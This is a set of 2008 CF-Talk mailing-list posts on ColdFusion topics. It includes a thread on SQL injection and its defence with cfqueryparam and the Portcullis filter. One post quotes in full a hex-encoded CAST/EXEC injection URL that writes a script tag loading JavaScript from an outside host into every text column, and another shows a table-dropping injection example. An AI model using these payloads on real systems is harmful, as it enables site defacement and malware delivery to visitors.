http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month On Tue, Jul 22, 2008 at 10:11 PM, Aaron Rouse [EMAIL PROTECTED] wrote: Even if you split it out, would the processing page not still end up calling the same amount of methods unless you could redesign the build process somehow? I sometimes wonder if speed is the ultimate goal and at any cost if it might just be better to use included files with UDFs when needed over CFCs. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309451 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
I saw this on the Riaforge update today. Looks like a SQL Jimmy wrapper for your site. http://portcullis.riaforge.org/ -- Portcullis is a CFC based url,form,cookie filter to help protect against SQL Injection and XSS (Cross Site Scripting) atacks. This CFC can help filter input, strip tags and escape HTML based on internal settings. It can also log attacks and temporarily block future attempts based on a set time limit. Portcullis can be installed into any ColdFusion application as a simple shared scoped singleton. 1.0.5 (7/21/2008) - Added some key words to block the popular CAST()/ASCII injection attack. Also, fixed a bug reported if ampersands are in the url string it sometimes mixes up the variable naming --- 1.0.5 was updated yesterday. Coincidence? I think not. ;) ~G~ -- If everything seems under control, you're not going fast enough -- Mario Andretti ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309452 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: DataSource Events like Before Commit?
Joseph, I did some googling and found that Oracle has 'proxy user authentication'. See this Ask Tom article (someone wanting to do the same thing as you are, but in java): http://tinyurl.com/6qe8xk Although I don't know if you can do it with the ColdFusion setup directly, but maybe you can access some underlying java component to do it. Hopefully this might give you another alternative. Let me know how it turns out. Dave -Original Message- From: Joseph Bugeja [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 7:57 AM To: CF-Talk Subject: Re: DataSource Events like Before Commit? Exactly! You perfectly understood my concern. If ColdFusion supported dynamic connection parameter injection or proxy authentication then we can identify the connection pool users but there is no straightforward solution to this. Through pooling we are connected through one db user which for security complaince (PCI) we need to remove this hole while keeping the benefits of pooling. Triggers can help certainly help us for auditing but again at db level I do not want have the same user showing up in my logs. Got it. Now I understand better. You want to pass the userid of your 'logged in user' to track the change in the database instead of using the user id that the datasource is logged in as. I don't see any way for you to do this without changing your code. Maybe someone else can come up with something, but I just don't see any way around it. Whether you change it to implement the idea you had below or do it some other way, bottom line is, you will need to change your code to make Oracle aware of each individual user's ID. You might still be able to find a way to use the triggers, but I still think you'll need a code change. Sorry, no help. Dave Thanks again for your reply. Unfortunately, I need to pass the userid prior to executing each query as otherwise the auditing function would not know the userid. We have triggers on tables but triggers need the read the userid apriori. ColdFusion does not allow us to build our connection string dynamically or to dynamically inject connection string variables (such as the userid), as is the case with VB.NET and C#. This is why I am looking for an alternative. Joseph, I think Gert's suggestion earlier could work for you. You could design a trigger to fire the stored procedure prior to any Inserts or Updates. Check a before ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309453 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Easy way to dump contents of a CFC?
Hi cfdump with a cfc shows the methods of the cfc. Is there an easy way to see the values stored in CFC? Does it work recursively, so if a cfc member points to another cfc instance, then that cfc is dumped in the same way? We're on cfmx 6 and also 7. Thanks Mark ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309454 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Let me just jump in with a quick question or two about this... Is this something that using cfqueryparam doesn't take care of? Is this a serious enough problem that we need to use such measures as Portcullis to defend our sites? I do see form injection attempts at times through forms on my clients' sites, but they've always been caught by cfqueryparam and haven't caused any problems. Rick -Original Message- From: Gerald Guido [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 9:23 AM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... I saw this on the Riaforge update today. Looks like a SQL Jimmy wrapper for your site. http://portcullis.riaforge.org/ -- Portcullis is a CFC based url,form,cookie filter to help protect against SQL Injection and XSS (Cross Site Scripting) atacks. This CFC can help filter input, strip tags and escape HTML based on internal settings. It can also log attacks and temporarily block future attempts based on a set time limit. Portcullis can be installed into any ColdFusion application as a simple shared scoped singleton. 1.0.5 (7/21/2008) - Added some key words to block the popular CAST()/ASCII injection attack. Also, fixed a bug reported if ampersands are in the url string it sometimes mixes up the variable naming --- 1.0.5 was updated yesterday. Coincidence? I think not. ;) ~G~ -- If everything seems under control, you're not going fast enough -- Mario Andretti ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309455 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Easy way to dump contents of a CFC?
Similar to how other people store instance data, I create a CFC-based struct variable, usually named instance. Then, I create a getInstance() function that returns the instance struct. It will show me everything stored at the point in time the struct variable is dumped. It's not recursive, however. m!ke -Original Message- From: Gaulin, Mark [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 8:30 AM To: CF-Talk Subject: Easy way to dump contents of a CFC? Hi cfdump with a cfc shows the methods of the cfc. Is there an easy way to see the values stored in CFC? Does it work recursively, so if a cfc member points to another cfc instance, then that cfc is dumped in the same way? We're on cfmx 6 and also 7. Thanks Mark ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309456 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: DataSource Events like Before Commit?
Dave, That's exactly what I was looking for - proxy authentication. I created a thread on this forum about this but the reply I got is that ColdFusion does not natively support this. So, the solution is to either create our own JNDI datasource using Java. However, I decided to not go this way and instead set the client identifier prior to executing each query. This should work and according to my testing it does not inflict a heavy performance degradation. Joseph, I did some googling and found that Oracle has 'proxy user authentication'. See this Ask Tom article (someone wanting to do the same thing as you are, but in java): http://tinyurl.com/6qe8xk Although I don't know if you can do it with the ColdFusion setup directly, but maybe you can access some underlying java component to do it. Hopefully this might give you another alternative. Let me know how it turns out. Dave Exactly! You perfectly understood my concern. If ColdFusion supported dynamic connection parameter injection or proxy authentication then we can identify the connection pool users but there is no straightforward solution to this. Through pooling we are connected through one db user which for security complaince (PCI) we need to remove this hole while keeping the benefits of pooling. Triggers can help certainly help us for auditing but again at db level I do not want have the same user showing up in my logs. Got it. Now I understand better. You want to pass the userid of your 'logged in user' to track the change in the database instead of using the user id that the datasource is logged in as. I don't see any way for you to do this without changing your code. Maybe someone else can come up with something, but I just don't see any way around it. Whether you change it to implement the idea you had below or do it some other way, bottom line is, you will need to change your code to make Oracle aware of each individual user's ID. You might still be able to find a way to use the triggers, but I still think alternative. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309457 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: DataSource Events like Before Commit?
Why not just set it in their session and then you are only setting it once and referencing that for each query you execute. On Tue, Jul 22, 2008 at 9:06 AM, Joseph Bugeja [EMAIL PROTECTED] wrote: Dave, That's exactly what I was looking for - proxy authentication. I created a thread on this forum about this but the reply I got is that ColdFusion does not natively support this. So, the solution is to either create our own JNDI datasource using Java. However, I decided to not go this way and instead set the client identifier prior to executing each query. This should work and according to my testing it does not inflict a heavy performance degradation. Joseph, I did some googling and found that Oracle has 'proxy user authentication'. See this Ask Tom article (someone wanting to do the same thing as you are, but in java): http://tinyurl.com/6qe8xk Although I don't know if you can do it with the ColdFusion setup directly, but maybe you can access some underlying java component to do it. Hopefully this might give you another alternative. Let me know how it turns out. Dave ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309458 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: do not increase counter is returns 0
Hominid: Any member of the biological family Hominidae (the great apes), including the extinct and extant humans, chimpanzees, gorillas, and orangutans. Thank you. Adrian :OD -Original Message- From: Brian Kotek [mailto:[EMAIL PROTECTED] Sent: 03 June 2008 21:08 To: CF-Talk Subject: Re: do not increase counter is returns 0 Thank you, Charlie. Yes, as you point out, I have tried over and over to explain things to Erik as well as reiterate that what he asks about are things that would be explained in the first few chapters of any book (or even website tutorial) on the subject. Instead, he absolutely refuses to try to learn himself and instead keeps on asking questions. Why? Because people keep answering them. I'm trying to help him AND the list because the current situation is harming both. But to be honest, the fact that Mr. Roberts misses the point completely and resorts to the very ad hominid attacks he condemns is not shocking in the slightest. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309459 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
writing protected CF with CFStoredProc
Hello folks: The discussion yesterday regarding using CFqueryparam to protect sites from SQL Injection attacks got me thinking. Well, it is easy enough to use CFQUERYPARAM everywhere inside CFQUERY tags, wherever a variable is passed to the SQL query. However, how do you do that with CFStoredProc? If I understand correctly, if you want to protect calls to stored procs (from SQL injection and the like), you have to use cfstoredproc and cfprocparam instead of cfquery and cfqueryparam. But apparently, you can't indicate what parameters you're actually passing. Am I missing something? Say you had a proc that looked like this: CREATE PROC sps_testproc @AID int = null, @BID int = null as IF @AID is not null SELECT @AID IF @AID is not NULL SELECT @BID If I was using CFQUERY, unprotected-style, I might write this: cfquery ... sps_testproc cfif whichvar = A @aid=123 cfelse @bid=456 /cfif /cfquery If I was using CFSTOREDPROC, I might write this: cfstoredproc procedure=sps_testproc... cfprocparam type=in cfsqltype=cf_sql_integer value=123 . /cfstoredproc See my problem? In my proc example, we don't need to know which of the two params is going to be passed to it. In the CFQUERY, I use that to pass one param or the other depending on something else (the value of whichvar). But as far as I can tell, CFSTOREDPROC doesn't let me tell it which parameter I'm passing -- presumably it wants all parameters, in order. So maybe I need something like this: cfstoredproc procedure=sps_testproc... cfif whichvar=A cfprocparam type=in cfsqltype=cf_sql_integer value=123 cfprocparam type=in cfsqltype=cf_sql_integer value=null cfelse cfprocparam type=in cfsqltype=cf_sql_integer value=null cfprocparam type=in cfsqltype=cf_sql_integer value=456 /cfstoredproc That kind of sucks, right? Am I making any sense? Any thoughts and/or suggestions? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309460 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: writing protected CF with CFStoredProc
Why not pass both to the proc, then rewrite the proc so that rather than testing for it's existence, you're testing for whether or not it's blank? -Original Message- From: Qing Xia [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 9:21 AM To: CF-Talk Subject: writing protected CF with CFStoredProc Hello folks: The discussion yesterday regarding using CFqueryparam to protect sites from SQL Injection attacks got me thinking. Well, it is easy enough to use CFQUERYPARAM everywhere inside CFQUERY tags, wherever a variable is passed to the SQL query. However, how do you do that with CFStoredProc? If I understand correctly, if you want to protect calls to stored procs (from SQL injection and the like), you have to use cfstoredproc and cfprocparam instead of cfquery and cfqueryparam. But apparently, you can't indicate what parameters you're actually passing. Am I missing something? Say you had a proc that looked like this: CREATE PROC sps_testproc @AID int = null, @BID int = null as IF @AID is not null SELECT @AID IF @AID is not NULL SELECT @BID If I was using CFQUERY, unprotected-style, I might write this: cfquery ... sps_testproc cfif whichvar = A @aid=123 cfelse @bid=456 /cfif /cfquery If I was using CFSTOREDPROC, I might write this: cfstoredproc procedure=sps_testproc... cfprocparam type=in cfsqltype=cf_sql_integer value=123 .. /cfstoredproc See my problem? In my proc example, we don't need to know which of the two params is going to be passed to it. In the CFQUERY, I use that to pass one param or the other depending on something else (the value of whichvar). But as far as I can tell, CFSTOREDPROC doesn't let me tell it which parameter I'm passing -- presumably it wants all parameters, in order. So maybe I need something like this: cfstoredproc procedure=sps_testproc... cfif whichvar=A cfprocparam type=in cfsqltype=cf_sql_integer value=123 cfprocparam type=in cfsqltype=cf_sql_integer value=null cfelse cfprocparam type=in cfsqltype=cf_sql_integer value=null cfprocparam type=in cfsqltype=cf_sql_integer value=456 /cfstoredproc That kind of sucks, right? Am I making any sense? Any thoughts and/or suggestions? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309461 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: writing protected CF with CFStoredProc
Yup, you're making sense. The way around it is to pass NULL in using: cfprocparam null=true Adrian -Original Message- From: Qing Xia [mailto:[EMAIL PROTECTED] Sent: 22 July 2008 15:21 To: CF-Talk Subject: writing protected CF with CFStoredProc Hello folks: The discussion yesterday regarding using CFqueryparam to protect sites from SQL Injection attacks got me thinking. Well, it is easy enough to use CFQUERYPARAM everywhere inside CFQUERY tags, wherever a variable is passed to the SQL query. However, how do you do that with CFStoredProc? If I understand correctly, if you want to protect calls to stored procs (from SQL injection and the like), you have to use cfstoredproc and cfprocparam instead of cfquery and cfqueryparam. But apparently, you can't indicate what parameters you're actually passing. Am I missing something? Say you had a proc that looked like this: CREATE PROC sps_testproc @AID int = null, @BID int = null as IF @AID is not null SELECT @AID IF @AID is not NULL SELECT @BID If I was using CFQUERY, unprotected-style, I might write this: cfquery ... sps_testproc cfif whichvar = A @aid=123 cfelse @bid=456 /cfif /cfquery If I was using CFSTOREDPROC, I might write this: cfstoredproc procedure=sps_testproc... cfprocparam type=in cfsqltype=cf_sql_integer value=123 .. /cfstoredproc See my problem? In my proc example, we don't need to know which of the two params is going to be passed to it. In the CFQUERY, I use that to pass one param or the other depending on something else (the value of whichvar). But as far as I can tell, CFSTOREDPROC doesn't let me tell it which parameter I'm passing -- presumably it wants all parameters, in order. So maybe I need something like this: cfstoredproc procedure=sps_testproc... cfif whichvar=A cfprocparam type=in cfsqltype=cf_sql_integer value=123 cfprocparam type=in cfsqltype=cf_sql_integer value=null cfelse cfprocparam type=in cfsqltype=cf_sql_integer value=null cfprocparam type=in cfsqltype=cf_sql_integer value=456 /cfstoredproc That kind of sucks, right? Am I making any sense? Any thoughts and/or suggestions? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309462 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Easy way to dump contents of a CFC?
Is there an easy way to see the values stored in CFC? In my CFCs I place all instance variables into an instance struct. Then I can use: cffunction name=getMemento access=public returntype=Struct output=false cfargument name=collection type=struct required=false default=#structNew()# cfset var Local = StructNew() cfloop collection=#variables.instance# item=Local.i cfif StructKeyExists(variables.instance, Local.i) cfset arguments.collection[Local.i] = variables.instance[Local.i] /cfif /cfloop cfreturn arguments.collection /cffunction If you place everything in the variables scope, you can use: cffunction name=getMemento cfreturn duplicate(variables) / /cffunction Keep in mind that this will also display all methods of the CFC as well. Does it work recursively, so if a cfc member points to another cfc instance, then that cfc is dumped in the same way? Unfortunately, any composite CFCs will display in their 'object' representation, unless you build a recursive getMemento method, and each child object would have to support that interface. HTH, Rich ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309463 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: writing protected CF with CFStoredProc
What's wrong with using: cfquery ... exec sps_testproc cfif whichvar = A @aid=cfqueryparam value=123 cfsqltype=cf_sql_integer cfelse @bid=cfqueryparam value=456 cfsqltype=cf_sql_integer /cfif /cfquery ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309464 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: writing protected CF with CFStoredProc
Oh yeah, you are right, of course. There is no NULL in CF so if I do a Value=NULL that will only confuse SQL. Cool, thanks! On Tue, Jul 22, 2008 at 10:27 AM, Adrian Lynch [EMAIL PROTECTED] wrote: Yup, you're making sense. The way around it is to pass NULL in using: cfprocparam null=true Adrian -Original Message- From: Qing Xia [mailto:[EMAIL PROTECTED] Sent: 22 July 2008 15:21 To: CF-Talk Subject: writing protected CF with CFStoredProc Hello folks: The discussion yesterday regarding using CFqueryparam to protect sites from SQL Injection attacks got me thinking. Well, it is easy enough to use CFQUERYPARAM everywhere inside CFQUERY tags, wherever a variable is passed to the SQL query. However, how do you do that with CFStoredProc? If I understand correctly, if you want to protect calls to stored procs (from SQL injection and the like), you have to use cfstoredproc and cfprocparam instead of cfquery and cfqueryparam. But apparently, you can't indicate what parameters you're actually passing. Am I missing something? Say you had a proc that looked like this: CREATE PROC sps_testproc @AID int = null, @BID int = null as IF @AID is not null SELECT @AID IF @AID is not NULL SELECT @BID If I was using CFQUERY, unprotected-style, I might write this: cfquery ... sps_testproc cfif whichvar = A @aid=123 cfelse @bid=456 /cfif /cfquery If I was using CFSTOREDPROC, I might write this: cfstoredproc procedure=sps_testproc... cfprocparam type=in cfsqltype=cf_sql_integer value=123 .. /cfstoredproc See my problem? In my proc example, we don't need to know which of the two params is going to be passed to it. In the CFQUERY, I use that to pass one param or the other depending on something else (the value of whichvar). But as far as I can tell, CFSTOREDPROC doesn't let me tell it which parameter I'm passing -- presumably it wants all parameters, in order. So maybe I need something like this: cfstoredproc procedure=sps_testproc... cfif whichvar=A cfprocparam type=in cfsqltype=cf_sql_integer value=123 cfprocparam type=in cfsqltype=cf_sql_integer value=null cfelse cfprocparam type=in cfsqltype=cf_sql_integer value=null cfprocparam type=in cfsqltype=cf_sql_integer value=456 /cfstoredproc That kind of sucks, right? Am I making any sense? Any thoughts and/or suggestions? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309465 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: writing protected CF with CFStoredProc
True! I can certainly do this as well. On Tue, Jul 22, 2008 at 10:40 AM, morgan l [EMAIL PROTECTED] wrote: What's wrong with using: cfquery ... exec sps_testproc cfif whichvar = A @aid=cfqueryparam value=123 cfsqltype=cf_sql_integer cfelse @bid=cfqueryparam value=456 cfsqltype=cf_sql_integer /cfif /cfquery ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309466 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: writing protected CF with CFStoredProc
In your example you are altering the behavior of the query based upon input which does not affect injection attacks. The idea of protecting against injection attacks is to stop invalid values from being executed within the query/SP. Take for example this query: delete from customer where customerId = 1 if this query were parameterized from CF without cfqueryparam you would have: delete from customer where customerId = #customerId# If someone were trying to inject sql they could inject 1;drop customers; as the parameter and without the queryparam, it would be executed literally as the following and drop the customers table: delete from customer where lastname = 1; drop customers; To prevent this we utilize cfqueryparam which parameterizes the query that is passed. As I understand it, this informs the database that the value being passed is of a specific datatype. So in the previous example: delete from customer where customerId = cfqueryparam value=#customerId# cfsqltype=cf_sql_integer null=false / In essense, the database sees this as: declare @custId int set @custId = 1 delete from customer where customerId = @custId This has the benefit of not allowing the additional SQL to be injected, and I just learned recently, it also creates a parameterized query which on SQL server creates a cached query execution plan, minimially increasing performance. HTH, Rich ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309467 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger
Mark, I went to your site Coldfusionmuse to read about that attack. I then noticed the link to cfwebtools at the top. Needing some help with a project, I looked at one of the sites they helped create only to see that same SQL injection attack had succeeded on the site (www.rentiowa.com). Brian This is a popular and very malicious SQL injection attack that is making the rounds: http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-A SCII -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309468 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger
Okay, stupidly, I clicked on rent.com (? Used to avoid perpetuation) to see what Brian was talking about and now I see the reference to a .js file on one of the pages. I didn't just infect my pc with something, did I? I surely hope that we are not perpetuating some virus with these e-mails. Also, Brian, IMHO, I think your comment would have been more appropriate to make off-list. Sincerely, Dave Phillips ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309469 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Report Builder Question
Yes, it sucks that the option is not available for the entire band. For it to suppress the footer, you have to set all of the fields' Remove line when blank property to true in the footer section. Also if there is blank space between your fields/lines try adding dummy labels with just a space for the text value and place it between your blank sections of the footer and be sure the set those field's Remove line when blank to true as well. Hope this helps. -Carlos It does prevent the text from being displayed, but the whitespace is still present. As far as I can see, there is no way to set that option on the entire footer, just all of the contents inside the footer. Thanks for the suggestion. I'm happy to try any option! Hi, Try setting the footer text Remove line when blank property to true. -Carlos ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309470 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Report Builder Question
Yes, it sucks that the option is not available for the entire band. For it to suppress the footer, you have to set all of the fields' Remove line when blank property to true in the footer section. Also if there is blank space between your fields/lines try adding dummy labels with just a space for the text value and place it between your blank sections of the footer and be sure the set those field's Remove line when blank to true as well. Hope this helps. -Carlos It does prevent the text from being displayed, but the whitespace is still present. As far as I can see, there is no way to set that option on the entire footer, just all of the contents inside the footer. Thanks for the suggestion. I'm happy to try any option! Hi, Try setting the footer text Remove line when blank property to true. -Carlos ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309471 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: DataSource Events like Before Commit?
Yes, I'll work on something like that but it requires heavy testing to make sure that the solution is correct. Pooling is quite a difficult topic and not very much documented topic (I could not find a document that explains how the ColdFusion driver is communicating with Oracle - like what if the pool size is set to 1 and there are two concurrent connections, then what happens with the Oracle session - does it open a session for each user or it uses time-sharing, etc.?). It could be the case that when I set the user id through a stored procedure, another user comes in, reusing an existing connection from the pool, and then that will mess up the authentication process. However, through transactions we are guaranteed that what is in the transaction is committed/rollbacked in a block. The disadvantage with transactions is that they cannot be nested and they affect the performance. Why not just set it in their session and then you are only setting it once and referencing that for each query you execute. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309472 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Ma rk Kruger
Okay, stupidly, I clicked on rent.com (? Used to avoid perpetuation) to see what Brian was talking about and now I see the reference to a .js file on one of the pages. I didn't just infect my pc with something, did I? I surely hope that we are not perpetuating some virus with these e-mails. Having your browser request a .js file, by itself, should not be sufficient to infect your machine with anything. However, that's largely up to you, when you configure your machine. First, ideally, you should not be logged into your machine as an administrator. This prevents the execution of any code that will change the operating system configuration (like viruses or malware in general). In addition, arbitrary executables should not be allowed to install something without requesting permission, so that even if you were logged in as an administrator, you would be prompted to allow or deny the installation of ActiveX controls or the like. Based on my examination of one of the .js files yesterday, I doubt there's any kind of harmful payload. It looks like the goal of the attack is click fraud - driving up traffic where none would otherwise exist. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309473 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: 